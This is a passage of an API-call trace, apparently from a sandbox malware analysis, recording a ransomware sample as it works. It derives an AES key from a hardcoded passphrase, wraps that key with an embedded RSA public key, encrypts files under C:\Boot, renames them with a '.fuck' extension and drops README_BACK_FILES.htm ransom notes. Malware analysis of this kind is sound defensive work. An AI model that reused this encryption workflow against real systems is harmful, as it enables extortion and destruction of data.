dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.051] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0127.051] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ee318) returned 1 [0127.051] CryptImportPublicKeyInfo (in: hCryptProv=0x27ee318, dwCertEncodingType=0x1, pInfo=0x27dab98*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27dabc8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27dabd0*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69e1a8) returned 1 [0127.051] CryptEncrypt (in: hKey=0x69e1a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0127.051] CryptEncrypt (in: hKey=0x69e1a8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27edf60*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27edf60*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0127.051] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27edf60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27edf60*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0127.052] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27fae90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27fae90, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0127.052] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fae90*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27fae90*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0127.052] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27fae90*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27fae90*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0127.052] CloseHandle (hObject=0xffffffff) returned 1 [0127.052] CloseHandle (hObject=0x5cd8) returned 1 [0127.053] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), bFailIfExists=0) returned 0 [0127.056] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf", dwFileAttributes=0x0) returned 0 [0127.056] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf.gsg")) returned 1 [0127.057] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\segoen_slboot.ttf.fuck" (normalized: "c:\\boot\\fonts\\segoen_slboot.ttf.fuck")) returned 0 [0127.057] CryptDestroyHash (hHash=0x69d368) returned 1 [0127.057] CryptDestroyKey (hKey=0x69d428) returned 1 [0127.057] CryptReleaseContext (hProv=0x27ed080, dwFlags=0x0) returned 1 [0127.057] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.057] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0127.058] GetLastError () returned 0x5 [0127.058] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf")) returned 0x20 [0127.058] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf", dwFileAttributes=0x80) returned 0 [0127.058] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.058] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0127.058] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf.gsg", dwFileAttributes=0x2) returned 1 [0127.059] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed080) returned 1 [0127.060] CryptCreateHash (in: hProv=0x27ed080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0127.060] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0127.060] CryptHashData (hHash=0x69d368, pbData=0x5bcf70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0127.060] CryptDeriveKey (in: hProv=0x27ed080, Algid=0x6610, hBaseData=0x69d368, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d6e8) returned 1 [0127.060] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.060] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0127.061] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ee5c0) returned 1 [0127.061] CryptImportPublicKeyInfo (in: hCryptProv=0x27ee5c0, dwCertEncodingType=0x1, pInfo=0x27dba38*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27dba68*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27dba70*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69db68) returned 1 [0127.061] CryptEncrypt (in: hKey=0x69db68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0127.061] CryptEncrypt (in: hKey=0x69db68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ede50*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ede50*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0127.061] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ede50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ede50*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0127.062] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27fae90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27fae90, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0127.062] CryptEncrypt (in: hKey=0x69d6e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fae90*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27fae90*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0127.062] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27fae90*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27fae90*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0127.062] CloseHandle (hObject=0xffffffff) returned 1 [0127.062] CloseHandle (hObject=0x5cd8) returned 1 [0127.063] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), bFailIfExists=0) returned 0 [0127.066] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf", dwFileAttributes=0x0) returned 0 [0127.066] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf.gsg" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf.gsg")) returned 1 [0127.067] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\segoe_slboot.ttf.fuck" (normalized: "c:\\boot\\fonts\\segoe_slboot.ttf.fuck")) returned 0 [0127.068] CryptDestroyHash (hHash=0x69d368) returned 1 [0127.068] CryptDestroyKey (hKey=0x69d6e8) returned 1 [0127.068] CryptReleaseContext (hProv=0x27ed080, dwFlags=0x0) returned 1 [0127.068] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.068] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0127.068] GetLastError () returned 0x5 [0127.068] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20 [0127.068] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf", dwFileAttributes=0x80) returned 0 [0127.069] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.069] CreateFileA (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0127.069] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.gsg", dwFileAttributes=0x2) returned 1 [0127.069] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed080) returned 1 [0127.071] CryptCreateHash (in: hProv=0x27ed080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0127.071] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0127.071] CryptHashData (hHash=0x69d6e8, pbData=0x5bcdb8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0127.071] CryptDeriveKey (in: hProv=0x27ed080, Algid=0x6610, hBaseData=0x69d6e8, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0127.071] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.071] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0127.071] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27eddc8) returned 1 [0127.072] CryptImportPublicKeyInfo (in: hCryptProv=0x27eddc8, dwCertEncodingType=0x1, pInfo=0x27dbe48*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27dbe78*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27dbe80*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69dba8) returned 1 [0127.072] CryptEncrypt (in: hKey=0x69dba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0127.072] CryptEncrypt (in: hKey=0x69dba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27edfe8*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27edfe8*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0127.072] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27edfe8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27edfe8*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0127.073] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27fb698, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27fb698, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0127.073] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27fb698*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x27fb698*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0127.073] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27fb698*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27fb698*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0127.073] CloseHandle (hObject=0xffffffff) returned 1 [0127.073] CloseHandle (hObject=0x5cd8) returned 1 [0127.073] CopyFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.gsg"), lpNewFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), bFailIfExists=0) returned 0 [0127.077] SetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf", dwFileAttributes=0x0) returned 0 [0127.077] DeleteFileA (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.gsg" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.gsg")) returned 1 [0127.079] MoveFileA (lpExistingFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.fuck" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.fuck")) returned 0 [0127.079] CryptDestroyHash (hHash=0x69d6e8) returned 1 [0127.079] CryptDestroyKey (hKey=0x69d428) returned 1 [0127.079] CryptReleaseContext (hProv=0x27ed080, dwFlags=0x0) returned 1 [0127.079] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0127.079] FindClose (in: hFindFile=0x69d328 | out: hFindFile=0x69d328) returned 1 [0127.079] GetFileAttributesA (lpFileName="C:\\\\Boot\\Fonts\\README_BACK_FILES.htm" (normalized: "c:\\boot\\fonts\\readme_back_files.htm")) returned 0xffffffff [0127.079] AreFileApisANSI () returned 1 [0127.079] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d6a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0127.079] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\README_BACK_FILES.htm" (normalized: "c:\\boot\\fonts\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0127.080] GetFileType (hFile=0x5cec) returned 0x1 [0127.080] WriteFile (in: hFile=0x5cec, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0127.080] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0127.081] FindFirstFileA (in: lpFileName="C:\\\\Boot\\fr-CA\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d6e8 [0127.081] FindNextFileA (in: hFindFile=0x69d6e8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.081] FindNextFileA (in: hFindFile=0x69d6e8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.081] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: lpSystemTimeAsFileTime=0x2c5f40c) [0127.081] GetLastError () returned 0x0 [0127.081] GetFileAttributesA (lpFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui")) returned 0x20 [0127.081] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui", dwFileAttributes=0x80) returned 0 [0127.082] CreateFileA (lpFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0127.082] CreateFileA (lpFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cd8 [0127.082] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui.gsg", dwFileAttributes=0x2) returned 1 [0127.082] CryptAcquireContextA (in: phProv=0x2c5e408, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2c5e408*=0x27ed080) returned 1 [0127.084] CryptCreateHash (in: hProv=0x27ed080, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2c5e40c | out: phHash=0x2c5e40c) returned 1 [0127.084] lstrlenA (lpString="miyiMmnMTcbAzXSmrboOmHkozMlQm") returned 29 [0127.084] CryptHashData (hHash=0x69d328, pbData=0x5bcef8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0127.084] CryptDeriveKey (in: hProv=0x27ed080, Algid=0x6610, hBaseData=0x69d328, dwFlags=0x1000000, phKey=0x2c5e3f8 | out: phKey=0x2c5e3f8*=0x69d428) returned 1 [0127.084] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2c5e414, pcbBinary=0x2c5e3f4, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0127.084] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2c5e414, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0 | out: pvStructInfo=0x2c5e3e8, pcbStructInfo=0x2c5e3f0) returned 1 [0127.084] CryptAcquireContextA (in: phProv=0x2c5e404, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2c5e404*=0x27ed900) returned 1 [0127.085] CryptImportPublicKeyInfo (in: hCryptProv=0x27ed900, dwCertEncodingType=0x1, pInfo=0x27dbb08*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27dbb38*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27dbb40*, PublicKey.cUnusedBits=0x0), phKey=0x2c5e3fc | out: phKey=0x2c5e3fc*=0x69dc28) returned 1 [0127.085] CryptEncrypt (in: hKey=0x69dc28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2c5e3ec*=0x80) returned 1 [0127.085] CryptEncrypt (in: hKey=0x69dc28, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ee070*, pdwDataLen=0x2c5e400*=0x18, dwBufLen=0x80 | out: pbData=0x27ee070*, pdwDataLen=0x2c5e400*=0x80) returned 1 [0127.085] WriteFile (in: hFile=0x5cd8, lpBuffer=0x27ee070*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x27ee070*, lpNumberOfBytesWritten=0x2c5e410*=0x80, lpOverlapped=0x0) returned 1 [0127.085] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2796778, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778, lpNumberOfBytesRead=0x2c5e410*=0x0, lpOverlapped=0x0) returned 0 [0127.086] CryptEncrypt (in: hKey=0x69d428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x0, dwBufLen=0x400 | out: pbData=0x2796778*, pdwDataLen=0x2c5e410*=0x10) returned 1 [0127.086] WriteFile (in: hFile=0x5cd8, lpBuffer=0x2796778*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2c5e410, lpOverlapped=0x0 | out: lpBuffer=0x2796778*, lpNumberOfBytesWritten=0x2c5e410*=0x10, lpOverlapped=0x0) returned 1 [0127.086] CloseHandle (hObject=0xffffffff) returned 1 [0127.086] CloseHandle (hObject=0x5cd8) returned 1 [0127.086] CopyFileA (lpExistingFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui.gsg"), lpNewFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), bFailIfExists=0) returned 0 [0127.090] SetFileAttributesA (lpFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui", dwFileAttributes=0x0) returned 0 [0127.090] DeleteFileA (lpFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui.gsg" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui.gsg")) returned 1 [0127.091] MoveFileA (lpExistingFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), lpNewFileName="C:\\\\Boot\\fr-CA\\bootmgr.exe.mui.fuck" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui.fuck")) returned 0 [0127.091] CryptDestroyHash (hHash=0x69d328) returned 1 [0127.091] CryptDestroyKey (hKey=0x69d428) returned 1 [0127.091] CryptReleaseContext (hProv=0x27ed080, dwFlags=0x0) returned 1 [0127.091] FindNextFileA (in: hFindFile=0x69d6e8, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0 [0127.091] FindClose (in: hFindFile=0x69d6e8 | out: hFindFile=0x69d6e8) returned 1 [0127.091] GetFileAttributesA (lpFileName="C:\\\\Boot\\fr-CA\\README_BACK_FILES.htm" (normalized: "c:\\boot\\fr-ca\\readme_back_files.htm")) returned 0xffffffff [0127.091] AreFileApisANSI () returned 1 [0127.091] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x66d360, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 37 [0127.091] CreateFileW (lpFileName="C:\\\\Boot\\fr-CA\\README_BACK_FILES.htm" (normalized: "c:\\boot\\fr-ca\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2c5f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cec [0127.092] GetFileType (hFile=0x5cec) returned 0x1 [0127.092] WriteFile (in: hFile=0x5cec, lpBuffer=0x2c5e2cc*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2c5e2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c5e2cc*, lpNumberOfBytesWritten=0x2c5e2c4*=0x5ec, lpOverlapped=0x0) returned 1 [0127.093] FindNextFileA (in: hFindFile=0x69d8e8, lpFindFileData=0x2c5f898 | out: lpFindFileData=0x2c5f898) returned 1 [0127.093] FindFirstFileA (in: lpFileName="C:\\\\Boot\\fr-FR\\*.*", lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 0x69d328 [0127.093] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.093] FindNextFileA (in: hFindFile=0x69d328, lpFindFileData=0x2c5f4fc | out: lpFindFileData=0x2c5f4fc) returned 1 [0127.093] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2c5f40c | out: 